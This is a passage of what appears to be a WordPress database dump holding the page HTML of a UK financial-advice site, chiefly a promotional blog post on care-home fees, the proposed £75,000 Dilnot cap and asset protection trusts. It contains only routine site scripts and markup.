src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body>','&#13;\n	Whole of life insurance - an advisers tale','If you thinking that life insurance is a waste of money. Whole of Life Insurance is different as it will eventually pay-out, learn more about your options.','publish','closed','closed','','whole-of-life-insurance-an-advisers-tale','','','2017-09-21 16:34:43','2017-09-21 16:34:43','',0,'http://www.equalitywalk.org.uk/whole-of-life-insurance-an-advisers-tale',0,'page','',0),(119,1,'2017-09-21 16:34:44','2017-09-21 16:34:44','<body class=\"single single-post postid-1958 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Will You Avoid Care Home Costs?										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category/\" title=\"Trusts\">Trusts</a></li><li>Will You Avoid Care Home Costs?</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"\" style=\"float:right;\">&#13;\n										<div id=\"post-1958\" class=\"post-1958 post type-post status-publish format-standard has-post-thumbnail hentry category-trusts post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Will You Avoid Care Home Costs?</span>&#13;\n						<div class=\"post-content\">&#13;\n				<p>The long awaited proposals resulting from the Dilnot report were expected to outline a welcome and acceptable solution to the controversial issue of care home costs and paying for Care in England and Wales</p>&#13;\n<p><em><big>By Jacqui Johnson, Head of Corporate Development</big></em></p>&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<p><big>However upon closer examination, are they as g<span>enerous as first thought and will you be one of the lucky ones to avoid care home fees?</span></big></p>&#13;\n<p><span><big>On 15 February 2017, Jeremy Hunt, the Health Secretary, announced that a cap of £75,000 towards care costs could be introduced in 2017.</big></span></p>&#13;\n<p><big><span>This will be after the General Election, along with an increase in the mean-t</span>esting threshold from £23,250 (the current limit) to £123,000.</big></p>&#13;\n<p><span style=\"color: #99cc00;\"><big>So, how do the new proposal compare with the current situation?</big></span></p>&#13;\n<p><big>There are countless examples of people, who have carefully planned throughout their working life, hoping for a level of lifestyle that they feel is worthy of their efforts, and more importantly, of their contribution to society, especially if and when they reach retirement.</big></p>&#13;\n<p><big>But often there are extreme situations of people from similar financial backgrounds contributing widely different amounts towards the services, some will have to deal with the full financial burden of care home fees and others will avoid care home costs altogether.</big></p>&#13;\n<p><big>At the moment, basic social care must be provided for everyone, and this must be covered financially by the person’s <span style=\"color: #ff0000;\">primary care trust</span>. This means that a primary health need will be provided by the NHS for free, irrespective if this is in or out of hospital.</big></p>&#13;\n<p><big>If a person’s situation changes and or their health deteriorates, they will then be assessed for ongoing care and this will be one of four needs:  low, moderate, substantial or critical. Usually only substantial or critical care is then covered financially.</big></p>&#13;\n<p><span style=\"color: #99cc00;\"><big>Will you avoid care home costs &amp; fees?<br/></big></span></p>&#13;\n<p><big>We have heard about many situations where elderly people in particular, are ultimately forced to sell their home to pay for Long Term Care, where others may receive the same care for free.</big></p>&#13;\n<p><big>This led the government to task a Commission, launched on 20 July 2010, on the Funding of Care and Support, which was carried out by an independent body chaired by Andrew Dilnot.</big></p>&#13;\n<p><big>The recommendations from this report formed the basis of the recent announcement that there will be a cap on the amount an individual has to pay towards care. However is this all good news?</big></p>&#13;\n<p><big>When looked at in detail, the £75,000 cap will only apply to the actual social care costs. The widely used residential care costs, of which only about a third is for social care costs, is largely made up of ‘hotel’ costs which provides accommodation and food, and will still have to be paid for by people themselves.</big></p>&#13;\n<p><big>In addition, people paying for care may also find themselves subsidising people who are state funded due to the complicated way that local authorities pay care fees.</big></p>&#13;\n<p><big>Due to their purchasing power, local authorities can often command reduced rates compared with an individual, and combining that with the calculation used when working out what someone is eligible for in terms of assistance from the local authority, may mean that people end up paying more than £75,000.</big></p>&#13;\n<p><big>And is the £75,000 a realistic cap? Is it likely that most people will spend £75,000?</big></p>&#13;\n<p><big>It has been estimated that it would take about 4 or 5 years for someone in a care home – either a residential or a nursing home to reach the £75,000 cap, after which their fees would be fully funded.</big></p>&#13;\n<p><big>Considering the average time for the elderly to spend in a care home, it is unlikely that many will reach the fully funding situation.</big></p>&#13;\n<p><span style=\"color: #99cc00;\"><big>So what are the options?</big></span></p>&#13;\n<p><big>The insurance industry has been unattracted to this market for a long time due to the open-ended nature of the benefit, resulting in few appropriate financial product solutions.</big></p>&#13;\n<p><big>However, the health secretary indicated that future flexibility around pensions may change this view. In addition, the cap on contributions may encourage new solutions, and with a limited liability, the insurance industry may see a commercial opportunity.</big></p>&#13;\n<p><big>However this doesn’t present any immediate solution from the insurance sector, or certainly until 2017, the earliest when the new proposals would come into effect, if at all. No cross-party agreements have been signed off on this matter.</big></p>&#13;\n<p><big>So for individuals who are facing the issue of care now, there are still fees to contend with and assets which people would wish to protect.</big></p>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-1 .tagline-shadow:before,#reading-box-container-1 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-1\"><section class=\"reading-box \" style=\"background-color:#f6f6f6 !important;border-width:1px;border-color:#f6f6f6!important;border-right, left, top or bottom-width:3px !important;border-right, left, top or bottom-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"\" class=\"continue button large default\">Contact Us Today</a><h2>Need Advice? Get Started Today</h2><p>For Relevant, Actionable and Simple Advice About Your Assets...</p><a href=\"../contact-us/\" target=\"\" class=\"continue mobile-button button large default\">Contact Us Today</a></section></div>&#13;\n<p><i><i/>Jacqui Johnson – Head of Corporate Development, </i>Equity SMART</p>&#13;\n<p>Having dedicated more than 20 years of her life to Financial Services, Jacqui is an adaptable and dynamic professional with excellent relationship and communication skills matched with a confident, focused approach to achieve the financial goals of her clients.</p>&#13;\n<p>In her current role Jacqui is more than just a Development Manager; her background working with a diverse range of clients across industry sectors has given her a unique insight into the needs and financial pressures of both individuals and her corporate clients.</p>&#13;\n<p>Think of Jacqui as your eyes and ears in a fast moving and dynamic financial services market place.</p>&#13;\n							</div>&#13;\n									<div class=\"meta-info\">&#13;\n				<div class=\"vcard\">&#13;\n					By <span class=\"fn\"><a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span><span class=\"sep\">|</span>Categories: <a href=\"../category/\" title=\"View all posts in Trusts\" rel=\"category tag\">Trusts</a><span class=\"sep\">|</span><span class=\"meta-tags\">Tags: </span><span class=\"sep\">|</span><a href=\"../will-you-avoid-care-home-costs/\" title=\"Comment on Will You Avoid Care Home Costs?\">0 Comments</a>				</div>&#13;\n			</div>&#13;\n												<div class=\"share-box\">&#13;\n				<h4> </h4>&#13;\n				<ul class=\"social-networks social-networks-dark\"><li class=\"facebook\">&#13;\n						<a href=\"http://www.facebook.com/sharer.php?m2w&amp;s=100&amp;p[url]=http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/&amp;p[title]=Will%20You%20Avoid%20Care%20Home%20Costs?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Facebook&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Facebook</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"twitter\">&#13;\n						<a href=\"http://twitter.com/home?status=Will+You+Avoid+Care+Home+Costs%3F%20http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Twitter&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Twitter</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"linkedin\">&#13;\n						<a href=\"http://linkedin.com/shareArticle?mini=true&amp;url=http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/&amp;title=Will%20You%20Avoid%20Care%20Home%20Costs?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							LinkedIn&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>LinkedIn</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"reddit\">&#13;\n						<a href=\"http://reddit.com/submit?url=http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/&amp;title=Will%20You%20Avoid%20Care%20Home%20Costs?\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Reddit&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Reddit</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tumblr\">&#13;\n						<a href=\"http://www.tumblr.com/share/link?url=http%3A%2F%2Fwww.equalitywalk.org.uk%2Fwill-you-avoid-care-home-costs%2F&amp;name=Will+You+Avoid+Care+Home+Costs%3F&amp;description=The+long+awaited+proposals+resulting+from+the+Dilnot+report+were+expected+to+outline+a+welcome+and+acceptable+solution+to+the+controversial+issue+of+care+home+costs+and+paying+for+Care+in+England+and+Wales\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Tumblr&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Tumblr</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"google\">&#13;\n						<a href=\"https://plus.google.com/share?url=http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/\" onclick=\"javascript:window.open(this.href,&#13;&#10;  \'\', \'menubar=no,toolbar=no,resizable=yes,scrollbars=yes,height=600,width=600\');return false;\" target=\"_blank\" rel=\"nofollow\">&#13;\n							Google +1&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Google +1</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"tf-pinterest\">&#13;\n												<a href=\"#\">&#13;\n							Pinterest&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Pinterest</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n															<li class=\"email\">&#13;\n						<a href=\"mailto:?subject=Will You Avoid Care Home Costs?&amp;body=http://www.equalitywalk.org.uk/will-you-avoid-care-home-costs/\">&#13;\n							Email&#13;\n						</a>&#13;\n						<div class=\"popup\">&#13;\n							<div class=\"holder\">&#13;\n								<p>Email</p>&#13;\n							</div>&#13;\n						</div>&#13;\n					</li>&#13;\n									</ul></div>&#13;\n									<div class=\"about-author\">&#13;\n				<div class=\"title\"><h2>About the Author: <a href=\"../author/rs-r-admin/\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n				<div class=\"about-author-container\">&#13;\n					<div class=\"avatar\">&#13;\n											</div>&#13;\n					<div class=\"description\">&#13;\n											</div>&#13;\n				</div>&#13;\n			</div>&#13;\n			&#13;\n												&#13;\n							&#13;\n<!-- You can start editing here. -->&#13;\n&#13;\n&#13;\n			<!-- If comments are open, but there are no comments. -->&#13;\n&#13;\n	 &#13;\n&#13;\n&#13;\n									<div id=\"respond\" class=\"comment-respond\">&#13;\n				<h3 id=\"reply-title\" class=\"comment-reply-title\"><div class=\"title\"><h2> </h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <small><a rel=\"nofollow\" id=\"cancel-comment-reply-link\" href=\"../will-you-avoid-care-home-costs/\" style=\"display:none;\">Cancel reply</a></small>&#13;\n									</h3><form action=\"/\" method=\"post\" id=\"commentform\" class=\"comment-form\">&#13;\n																										<div id=\"comment-input\"><input type=\"text\" name=\"author\" id=\"author\" value=\"\" placeholder=\"Name (required)\" size=\"22\" tabindex=\"1\" aria-required=\"true\" class=\"input-name\"/><input type=\"text\" name=\"email\" id=\"email\" value=\"\" placeholder=\"Email (required)\" size=\"22\" tabindex=\"2\" aria-required=\"true\" class=\"input-email\"/></div>&#13;\n												<div id=\"comment-textarea\"/>												<p class=\"form-submit\">&#13;\n							<input name=\"submit\" type=\"submit\" id=\"comment-submit\" value=\"Post Comment\"/><input type=\"hidden\" name=\"comment_post_ID\" value=\"1958\" id=\"comment_post_ID\"/></p>&#13;\n						<p style=\"display: none;\"><input type=\"hidden\" id=\"akismet_comment_nonce\" name=\"akismet_comment_nonce\" value=\"ff56685229\"/></p>&#13;\n<p style=\"display: none;\"><input type=\"hidden\" id=\"ak_js\" name=\"ak_js\" value=\"190\"/></p>					&#13;\n							</form></div><!-- #respond -->&#13;\n			        <script type=\"text/javascript\"><![CDATA[\r\n            jQuery(document).ready(function () {\r\n                jQuery(\'#commentform\').submit(function () {\r\n                    _gaq.push(\r\n                            [\'_setAccount\', \'UA-10958181-3\'],\r\n                            [\'_trackEvent\', \'comment\', \'submit\']\r\n                    );\r\n                });\r\n            });\r\n        ]]></script></div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:left;\">&#13;\n	<div id=\"text-14\" class=\"widget widget_text\">			<div class=\"textwidget\"><p><b>FAST FACTS</b></p>&#13;\n<p>#1 Nowadays, 1 in every 6 men and 1 in every 4 women over 65 are having to move into care homes.</p>&#13;\n<p>#2 Residential care costs can run at anything between £25,000 and £50,000 a year.</p>&#13;\n<p>#3  All too often, people are having to sell their homes and other assets to pay these costs.</p>&#13;\n<p>#4 An Asset Protection Trust – if planned and managed carefully – can avoid this financial heartache.</p>&#13;\n<p>#5 Equity SMART have Asset Protection Trust experts who can help and advise you today.</p>&#13;\n</div>&#13;\n		</div>		<div id=\"recent-posts-5\" class=\"widget widget_recent_entries\">		<div class=\"heading\"><p>Recent Posts</p></div>		<ul><li>&#13;\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\n						</li>&#13;\n				</ul></div><div id=\"categories-4\" class=\"widget widget_categories\"><div class=\"heading\"><p>Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"iphorm-widget-2\" class=\"widget iphorm-widget\"><div id=\"iphorm-outer-5397b8c320d6b\" class=\"iphorm-outer iphorm-outer-12 iphorm-uniform-theme-default iphorm-theme-light-rounded\">&#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n		    